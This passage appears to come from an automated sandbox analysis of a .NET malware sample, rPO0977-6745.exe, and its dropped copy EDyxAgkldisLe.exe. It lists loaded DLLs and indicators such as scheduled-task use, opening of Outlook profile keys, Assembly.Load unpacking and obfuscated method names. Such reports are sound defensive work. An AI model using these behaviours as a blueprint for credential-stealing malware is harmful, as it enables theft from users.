              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: rasapi32.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: rasman.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: rtutils.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: secur32.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: schannel.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\rPO0977-6745.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\rPO0977-6745.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: rPO0977-6745.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: rPO0977-6745.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: rPO0977-6745.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: ikFw.pdbSHA256 source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr
              Source: Binary string: ikFw.pdb source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr

              Data Obfuscation

              barindex
              Source: rPO0977-6745.exe, Main.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: EDyxAgkldisLe.exe.0.dr, Main.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 0.2.rPO0977-6745.exe.7820000.5.raw.unpack, bg.cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs.Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs.Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
              Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs.Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
              Source: 0.2.rPO0977-6745.exe.31b9118.0.raw.unpack, bg.cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: rPO0977-6745.exeStatic PE information: 0x92C42B74 [Sat Jan 11 04:28:36 2048 UTC]
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_02F75DFF push esp; iretd 0_2_02F75E19
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D19060 push esp; ret 0_2_08D19061
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 0_2_08D16589 pushad ; retf 0_2_08D16595
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_014424B9 push 8BFFFFFFh; retf 10_2_014424BF
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBEC0E push es; iretd 10_2_06BBEC14
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBDA48 push es; ret 10_2_06BBEB88
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBEB92 push es; ret 10_2_06BBEB98
              Source: C:\Users\user\Desktop\rPO0977-6745.exeCode function: 10_2_06BBEB8A push es; ret 10_2_06BBEB90
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_00D49C40 push 80028793h; iretd 11_2_00D49C6D
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 11_2_00D45DFF push esp; iretd 11_2_00D45E19
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_00E424B9 push 8BFFFFFFh; retf 23_2_00E424BF
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EEA62 push es; ret 23_2_064EEA68
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EEAFA push es; ret 23_2_064EEB00
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EEBFE push es; iretd 23_2_064EEC14
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EEB8E push es; ret 23_2_064EEB90
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeCode function: 23_2_064EEB96 push es; ret 23_2_064EEB98
              Source: rPO0977-6745.exeStatic PE information: section name: .text entropy: 7.966999305787785
              Source: EDyxAgkldisLe.exe.0.drStatic PE information: section name: .text entropy: 7.966999305787785
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.csHigh entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, Dqkyhukd5DPEpWtsrk.csHigh entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, hWtek0zyFhm6YOkDOc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, TVHBd5rBSDSNtLCLLd.csHigh entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, YfsUVIwKwligCWwUFOb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, G3Zlh9sDOA6l6Xdsx8.csHigh entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, XiDiD0bdPoQPVP9xtF.csHigh entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, unupZHtXVeGThL8D36.csHigh entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, O5tYpwmEKrOLf39LE6.csHigh entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, H9cpRKwuIODiPO2dgX1.csHigh entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, SuXDWccPOvK5odiT5e.csHigh entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, bJvLSL34IERm7aJscU.csHigh entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, t2qt23C1ZO7pYQfAKA.csHigh entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, AqBlQbya8Vp6IS1UoE.csHigh entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, J7ecEYjmNahUm7LApD.csHigh entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, dlx18wvlGuFkC3sMg9.csHigh entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, JdId2Rh2LV5U7y7cd7.csHigh entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, xZ2HP9w52KJ9j9OhmHp.csHigh entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
              Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, xLOmlk5E6U3TdCC4SP.csHigh entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.csHigh entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, Dqkyhukd5DPEpWtsrk.csHigh entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, hWtek0zyFhm6YOkDOc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, TVHBd5rBSDSNtLCLLd.csHigh entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, YfsUVIwKwligCWwUFOb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, G3Zlh9sDOA6l6Xdsx8.csHigh entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
              Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, XiDiD0bdPoQPVP9xtF.csHigh entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
